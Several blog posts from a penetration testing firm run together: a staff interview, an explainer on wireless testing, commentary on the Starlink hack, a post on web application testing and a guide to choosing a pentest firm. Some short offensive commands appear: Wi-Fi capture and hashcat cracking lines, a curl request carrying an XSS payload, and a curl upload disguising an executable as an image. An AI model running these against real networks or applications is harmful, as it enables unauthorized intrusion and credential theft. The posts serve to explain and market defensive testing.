“Spending time with my family is what I enjoy most. My wife is a professional photographer and we have a four-year-old son. We work and work out, but we manage to work in a lot of time for our family.” — Brice Jager
Brice: Yeah, and the great part is that it gave me a way to move into IT. I was dealing with the company team that built the software at the same time I was interacting with the customer. That helped me understand the struggles on both sides and led to my next job at the helpdesk of a hospital. Eventually, I became a systems administrator, but I was really a jack of all trades. I was doing everything from installing software to repairing IoT devices. What I didn’t do was a lot of cybersecurity.
Jim: There was a cybersecurity incident at that time, right?
Brice: That’s right. It was my first experience of an attack in the wild, from the victim’s perspective, as it happened. It took a lot of work to recover, but we got it done within 48 hours.
Jim: That left an impression, I guess.
Brice: It sure did. I started pentesting on my own and really got excited about ethical hacking as a profession. Within a year, I had my CISSP, OSCP, OSWP, PNPT and KLCP (professional cybersecurity certifications).
Jim: Wow! I understand that each of those requires a lot of time and energy.
Brice: You bet, but it helps if you’re passionate about the field. It takes a LOT of sacrifice to earn those certifications while juggling work, family, and life.
Jim: How did you find your way to Raxis?
Brice: Oddly enough, I was doing some research on another company that I was considering. I reached out to Bonnie and she and Mark talked with me at length. Based on how easy they were to speak with, I knew it would be a great place to work. You just know good people when you talk to them.
Jim: What’s your favorite part?
Brice: My favorite part of this job is that pentesting is my job! And pentesting is, by far, the favorite job I’ve had so far. I love working with the best in the business here. It’s easy to ask questions, and it’s easy to weigh in when you’ve got an answer.
Plus we get to break into stuff . . . without getting in trouble.
Although social engineering attacks – including phishing, vishing, and smishing – are the most popular and reliable ways to gain unauthorized access to a network, some hackers simply don’t have the social or communications skills necessary to perform those attacks effectively. Wireless attacks, by contrast, are typically low-risk, high-reward opportunities that don’t often require direct interaction with the target.
That’s one reason why pentesting for wireless networks is one of Raxis’ most sought-after services. We have the expertise and tools to attack you in the same ways a real hacker will. In fact, I’ve successfully breached corporate networks from their parking lots, using inexpensive equipment, relatively simple techniques, and by attacking devices you might never suspect.
To appreciate how we test wireless networks, remember that wireless simply means sending radio signals from one device to another. The problem with that is that no matter how small the gap between them, there’s always room for a hacker to set up shop unless the network is properly secured.
So, if Raxis comes onsite to test your wireless network, the first thing we will likely do is map your network. This is a mostly passive activity in which we see how far away from your building the wireless signal travels normally. But we also have inexpensive directional antennas that allow us to access it from further away if we need to be stealthier.
Using the easily accessible aircrack-ng toolkit, we can monitor and capture traffic from wireless devices as well as send our own instructions to unprotected devices. (I’ll go into more detail about that in a moment.)
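For example, putting a wireless card into monitor mode and capturing nearby traffic takes just two commands (the interface name is a placeholder for your own):
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon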
As we establish the wireless network’s boundaries, we also determine whether there are guest networks or even open networks in use. Open networks, as the name implies, require no special permission to access. Even on controlled guest networks, we can usually get in with little effort if weak passwords are used or the same ones reused. Once we’re in as a guest, we’ll pivot to see if we can gain unauthorized access to other areas or other users’ data.
While this is going on, we will often set up a rogue access point, essentially just an unauthorized router that passes traffic to the internet. If the network is configured properly, it should detect this access point and prevent network traffic from accessing it. If not, however, we can capture the credentials of users who log into our device using a man-in-the-middle attack.
Our primary goal here is to capture usernames and password hashes, the characters that represent the password after it has been encrypted. In rare cases, we’re able to simply “pass the hash” and gain access by sending the encrypted data to the network server.
Most networks are configured to prevent this technique and force us to use a tool to try to crack the encryption. Such tools – again, readily available and inexpensive – can guess more than 300 billion combinations per second. So, if you’re using a short, simple password, we’ll have it in a heartbeat. Use one that’s more complex and it may take longer or we might never crack it.
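As one illustration, a captured WPA2 handshake converted to hashcat’s modern format can be attacked with a single command (file names are placeholders):
hashcat -m 22000 {Capture File} {Wordlist}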
If a network isn’t properly secured, however, we might be able to find a way in that doesn’t require a password. Many people who use wireless mice and keyboards, for example, don’t realize that we can sometimes intercept those signals as well. For non-Bluetooth devices, we can use our aircrack-ng tools to execute commands from a user’s (already logged-in) device.
As a proof of concept, we sometimes change screensavers or backgrounds so that network admins can see which devices are vulnerable. However, we can also press the attack and see if we’re able to pivot and gain additional access.
The good news for business owners is that there are simple methods to protect against all these attacks:
Never create an open network. The convenience does not justify the security risk.
If you have a guest network, make sure that it is not connected to the corporate network and that users are unable to access data from any others who may also be using it.
Use the latest wireless security protocol (WPA3) if possible.
If you’re using WPA2 Enterprise, make sure the network is requiring TLS and certificates.
If you’re using WPA3 Personal, make sure your password is at least 30 characters long. (That’s not a typo – 30 characters is still out of reach for most hash-cracking software.)
Here’s the most important piece of advice: Test your network regularly. New exploits are found every day, and hackers’ tools get better, faster, and cheaper every day. The only way to stay ahead of them is with professionals like us who live in their world every day.
And, trust me, you’d much rather have Raxis find your vulnerabilities than the bad guys.
“As a professional, ethical hacker, I’ve gotten questions from family, friends, and neighbors about what this means – from its impact on the cost of the service to the future of humanity, depending on the paranoia level of the person asking.”
Scottie Cole, Lead Penetration Tester
The big news from this year’s Black Hat and DEF CON 30 hacker conventions came from a presentation by a Belgian engineer, Lennert Wouters, detailing how he successfully hacked the entire Starlink ground network using one of the company’s own Dishy McFlatface® receivers. The (way oversimplified) summary is that he built a circuit board that allowed him to introduce a fault into Starlink’s security, which he then exploited to run custom code on the device.
After seeing some of the headlines, I now understand why some people are a little freaked out. So, as a public service, what follows is my opinion of what the non-hacker public should (and should not) take away from this news.
Yes, it’s a big deal (but maybe not for the reason you think). Let me be clear from the start, Lennert Wouters is a genius who deserves great respect for both the creative thinking and tenacity it took to accomplish this feat. This was a very complex hack that required a lot of hardware and software expertise, as well as a great deal of time to complete. That’s why . . .
The media’s “$25 in off-the-shelf components” is highly misleading. Scalpels are cheap, but you still don’t see a lot of DIY brain surgery. Expense usually isn’t a barrier to hackers, but expertise, time, and motivation frequently are. Wouters conceived of and executed the brilliant hack, but he was working on it because . . .
It was part of Starlink’s bug bounty program, designed to engage and reward super smart white hat hackers for finding problems first. In that sense, Wouters didn’t defeat Starlink’s cybersecurity but rather was an integral part of it. Other bounty hunters are still busy working on other exploits that could prove more significant – as are the bad guys. In fact . . .
The Russians (and likely others) have been trying to take down Starlink because the Ukrainian government now relies on the satellite network so heavily. State-sponsored hackers reportedly took down the Ukrainian government’s internet service early in the war. According to Starlink founder Elon Musk, however, the Russians have not been able to disrupt Ukraine’s access to the service or breach its network. Taken together, what all this means is that . . .
The Starlink hack, though impressive, likely does not represent a significant threat to the company or its users. On the one hand, I think this is a great story because I’m an electronics and “gadget” guy. As a penetration tester, however, I worry when business owners place a lot of focus on high-risk, low-probability hacks simply because they make the news. Over the course of thousands of penetration tests, the most common vulnerabilities Raxis finds are ones that are much simpler to exploit: weak passwords, missing software patches, insufficient network segmentation, and a host of other, more pedestrian problems. These vulnerabilities might not make news, but the successful attacks that follow – on a business, a hospital, or a school – many times do.
Wouters used a Starlink setup much like this one, plus “$25 in off-the-shelf materials” to carry out his hack. It’s a fascinating story, but there are much bigger threats facing businesses today.
The most important takeaways are that even the biggest corporate networks on Earth (and beyond) can be hacked, and that the most secure networks are those with an effective testing protocol that identifies vulnerabilities before they become breaches.
I’m Matt Dunn, a lead penetration tester at Raxis. This is the second of a two-part series, aimed at explaining the differences between authenticated and unauthenticated web application testing. I’ll also discuss the types of attacks we attempt in each scenario so you can see your app the way a hacker would.
Although some applications allow users to access some or all of their functionality without providing credentials – think of simple mortgage or BMI calculators, among many others – most require some form of authentication to ensure you are authorized to use them. If there are multiple user roles, authentication will also determine what privileges you have and/or what features you can access. This is commonly referred to as role-based access control.
As I mentioned in the previous post, Raxis conducts web application testing from the perspectives of both authenticated and unauthenticated users. In authenticated user scenarios, we also test the security and business logic of the app for all user roles. Here’s what that looks like from a customer perspective.
Unauthenticated Testing
As the name suggests, testing as an unauthenticated user involves looking for vulnerabilities that are public-facing. The most obvious is access: Can we use our knowledge and tools to get past the authentication process? If so, that’s a serious problem, but it’s not the only thing we check.
In previous articles and videos, we’ve talked about account enumeration – finding valid usernames based on error messages, response lengths, or response times. We will see what information the app provides after unsuccessful login attempts. If we can get a valid username, then we can use other tools and tactics to determine the password. As an example, see the two different responses from a forgot password API for valid and invalid usernames below:
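The screenshots aren’t reproduced here, but the telltale difference typically looks something like this (hypothetical responses for illustration, not from any real application):
{"status": "ok", "message": "Password reset email sent."}
{"status": "error", "message": "No account found for that username."}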
From an unauthenticated standpoint, we also will try injection attacks, such as SQL Injection, to attempt to break past login mechanisms. We’ll also look for protections using HTTP headers, such as Strict-Transport-Security and X-Frame-Options or Content-Security-Policy, to ensure users are as secure as they can be.
With some applications, we can use a web proxy tool to see which policies are enforced on the client-side interface and which are enforced on the server side. In a future post, we’ll go into more detail about web proxies. For now, it’s only important to know that proxies sometimes reveal vulnerabilities that allow us to bypass security used on the client and allow us to interact with the server directly.
As an example, fields that require specific values, such as an email field, may be verified to be in the proper format on the client-side (i.e. using JavaScript). Without proper safeguards in place, however, the server itself might accept any data, including malicious code, entered directly into that same field. In practice, this can be bypassed, leading to attacks such as Cross-Site Scripting, as shown in my CVE-2021-27956 that bypasses email verification.
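As a generic illustration (hypothetical endpoint and payload, not the actual CVE request), submitting directly to the server with curl sidesteps the client-side JavaScript check entirely:
curl -X POST https://{Target}/api/profile -H "Content-Type: application/json" -d '{"email":"<script>alert(1)</script>"}'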
Authenticated Testing
During an authenticated web application test, we use many of the same tactics, toward the same ends, as we do with unauthenticated tests. However, we have the added advantage of user access. This vantage point exposes more of the application’s attack surface and, with it, more potential vulnerabilities. This is why we recommend authenticated testing: to ensure that even a malicious user cannot exploit the application.
Once authenticated, we attempt to see if the app restricts users to the level of access that matches its business logic. This might mean we log in with freemium-level credentials and see if we can get to paid-users-only functionality. Or, in the role of a basic user, we may try to gain administrator privileges.
As with an unauthenticated test, we also see how much filtering of data is done at the interface vs. the server. Some apps have very tight server-level controls for authentication but rely on less-restrictive policies once the user is validated.
Though it may seem simple from the outside, one of the hardest things for web app developers to secure is file uploads.
This is another topic we’ll explore further in a future post, however, one good example of the complexity involved is photo uploads. Many apps enable or require users to create profiles that include pictures or avatars. One way to restrict the file type is by accepting only .jpg or .png file extensions. Hackers can sometimes get past this restriction by appending an executable file with a double extension – malware.exe.jpg, for example.
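With curl, for instance, the filename the server sees can be set independently of the real file; this only succeeds against weak validation (URL and field name are placeholders):
curl -F "avatar=@malware.exe;filename=malware.exe.jpg;type=image/jpeg" https://{Target}/upload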
Another problem is that malicious code can be embedded in otherwise legitimate file types, such as Word documents or spreadsheets. For many apps, however, it’s absolutely necessary to allow these file types. When we encounter such situations, we often work with customers to recommend other security measures that allow the app to work as advertised but that also detect and block malware.
Conclusion
As a software engineer by training, one advantage I have in testing web applications is understanding the mindset of the developers working on them. People building apps start with the goal of creating something useful for customers. As time goes on, the team changes or users’ needs change, and sometimes vulnerabilities are left behind. This can happen in expected ways, such as outdated libraries, or unexpected ways, such as missing access control on a mostly unused account type.
At Raxis, we employ a group of experts with diverse experiences and skillsets who will intentionally try to break the app and use it improperly. Having testers who have also developed applications gives us empathy for app creators. Even as we attack their work, we know that we are helping them remediate vulnerabilities and making it possible for them to achieve their application’s purpose.
I’m Bonnie Smyre, Raxis’ Chief Operating Officer. Penetration testing is a niche in the cybersecurity field, but one that is critical to the integrity of your network and your data. This is the first of a two-part guide to help you select the right firm for your needs.
Step 1: Identify Your Why
There are lots of reasons why companies should routinely do penetration testing. The most important is to understand your vulnerabilities as they appear to hackers in the real world and work to harden your defenses. It may also be that your industry or profession requires testing to comply with certain laws or regulations. Or perhaps you’ve been warned about a specific, credible threat.
Whatever your reasons for seeking help, you’ll want to look for a firm that has relevant experience. For example, if you run a medical office, you’ll need a penetration testing company that knows the ins and outs of the Health Insurance Portability and Accountability Act (HIPAA). If you’re a manufacturer with industrial control systems, you’ll need a company that understands supervisory control and data acquisition (SCADA) testing. The point is to make sure you know your why before you look for a pentest firm.
See a term you don’t recognize? Look it up in our glossary.
Step 2: Understand What You Have at Risk
A closely related task is to be clear about everything you need to protect. Though it might seem obvious from the above examples, companies sometimes realize too late that they are custodians of data seemingly unrelated to their primary mission. A law firm, for instance, might receive and inadvertently store login credentials for clients’ medical transcripts or bank accounts. Though its case files are stored on a secure server, a clever hacker could potentially steal personally identifiable information (PII) from the local hard drives.
Step 3: Determine What Type of Test You Need
General use of the term “pentesting” can cover a broad range of services, from almost-anything-goes red team engagements to vulnerability scans, though the latter is not a true penetration test. In last week’s post, lead penetration tester Matt Dunn discussed web application testing. There are also internal and external tests, as well as wireless, mobile, and API testing, to name a few. Raxis even offers continuous penetration testing for customers who need the ongoing assurance of security in any of these areas.
Raxis offers several types of penetration tests depending on your company’s needs.
Step 4: Consult Your Trusted Advisors
Most companies have IT experts on staff or on contract to manage and maintain their information systems. You may be inclined to start your search for a penetration testing service by asking them for recommendations – and that’s a good idea. Most consultants, such as managed service providers (MSPs), value-added resellers (VARs), and independent software vendors (ISVs), recognize the value of high-quality, independent penetration testing.
In the case of MSPs, it might even be part of their service offerings. However, it might make sense to insist on an arm’s-length relationship between the company doing the testing and the people doing the remediation.
If your provider is resistant to pentesting, it might be because the company is concerned that the findings will reflect poorly on its work. You can work through those issues by making it clear that you share an interest in improving security and that’s the purpose for testing.
The downloadable PDF below includes a list of Raxis services, with an explanation of what we test and a brief description of how we go about it.
Step 5: Check Reviews and Ratings
Another starting point – or at least a data point – is review and rating sites. These can be incredibly helpful since such sites usually include additional information about the services offered, types of customers, pricing, staffing, etc. That gives you a chance to compare each firm’s areas of expertise with the needs you identified in steps one and two. It can also introduce you to companies you might not have found otherwise.
Step 6: Talk to Their Customers
Once you have your short list of companies, it’s a good idea to talk to some of their customers, if possible, to find out what they liked or didn’t like about the service. Ask about communications: Were they kept in the loop about what was going on? Did the company explain both successful and unsuccessful breach attempts? Did they get a clear picture of the issues, presented as actionable storyboards?
In addition, it’s a good idea to ask about the people they worked with. Were they professional? Was it a full team or an individual? Did they bring a variety of skillsets to the table? Did they take time to understand your business model and test in a way that made sense? It’s important to remember here that many pentesting customers insist on privacy: the company may not be able to provide some references, and others may not be willing to discuss the experience. Some will, however, and that will add to your knowledge base.
If you’ve completed steps 1 through 6, you should be armed with the information you need to begin interviewing potential penetration testing companies. You’ll be able to explain what you need and gauge whether they seem like a good match or not. And you’ll know how their customers feel about their service.
If you found this post helpful, make sure to follow our blog. In the weeks ahead, we’ll be discussing the questions you should ask potential pentesting companies – and the answers you should expect to hear.